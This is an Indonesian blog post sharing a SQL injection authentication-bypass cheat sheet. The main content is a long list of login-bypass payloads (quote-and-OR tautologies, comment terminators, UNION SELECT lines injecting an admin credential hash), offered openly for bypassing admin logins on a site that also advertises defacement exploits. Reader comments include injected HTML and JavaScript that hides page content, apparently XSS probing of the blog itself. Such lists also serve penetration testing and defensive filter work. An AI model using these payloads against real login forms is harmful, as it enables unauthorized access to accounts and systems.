• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

SQL Injection Authentication Bypass Cheat Sheet

April 20, 2019 by Jack Wilder 7 Comments

SQL Injection Authentication Bypass Cheat Sheet. Kali ini saya akan sharing cheat sheet dari Authentication Bypass atau yang biasa kita kenal dengan bypass admin. Kreator dari cheatsheet ini adalah Dr. Emin İslam TatlıIf (OWASP Board Member). Jika kalian memiliki query lain bisa juga dishare disini.

SQL Injection Authentication Bypass Cheat Sheet

or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
'or 1=1 limit 1 -- -+
'=' 'or'
or '1'='1
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
==
and 1=1--
and 1=1
' or 'one'='one--
' or 'one'='one
' and 'one'='one
' and 'one'='one--
1') and '1'='1--
admin' --
admin' #
admin'/*
or 1=1--
or 1=1#
or 1=1/*
) or '1'='1--
) or ('1'='1--
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'

Baca juga:

  • Command Injection Bypass Cheatsheet

Sekian sharing kali ini. Jika ada yang ingin ditanyakan atau ditambahkan silahkan tinggalkan komentar.

Filed Under: Cheat Sheet

Reader Interactions

Comments

  1. J says

    January 8, 2023 at 12:55 am

    ‘or 1=1 limit 1 — -+

    Reply
  2. es says

    January 8, 2023 at 12:56 am

    test

    Reply
  3. gg says

    January 8, 2023 at 12:58 am

    .city {
    background-color: tomato;
    color: white;
    padding: 10px;
    }

    London
    London is the capital of England.

    Paris
    Paris is the capital of France.

    Tokyo
    Tokyo is the capital of Japan.

    Reply
  4. hhhh says

    January 8, 2023 at 1:00 am

    I’m a big, blue, strong paragraph

    Reply
  5. hhh says

    January 8, 2023 at 1:02 am

    myFunction()
    function myFunction() {
    var x = document.getElementsByClassName(“site-inner”);
    for (var i = 0; i < x.length; i++) {
    x[i].style.display = "none";
    }
    }

    Reply
  6. ma says

    February 20, 2024 at 2:06 pm

    ini username dan paswornya sama semua

    Reply
    • Yoo Cherry says

      March 5, 2024 at 7:47 pm

      maksudnya gimana

      Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

FastMail Custom Domain or Subdomain Takeover

Exploit WPStore Themes Upload Vulnerability

Deface WordPress dengan Exploit WordPress TheLoft Theme Arbitrary File Download Vulnerability

Surge.sh Custom Domain or Subdomain Takeover

Open Redirect Bypass Cheat Sheet

Azure Traffic Manager Custom Domain or Subdomain Takeover

bWAPP Remote File Inclusion Medium Security Level

Exploit WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability

GitHub Custom Domain or Subdomain Takeover

Laravel PHPUnit Remote Code Execution

LinuxSec / 9 queries in 0.07 seconds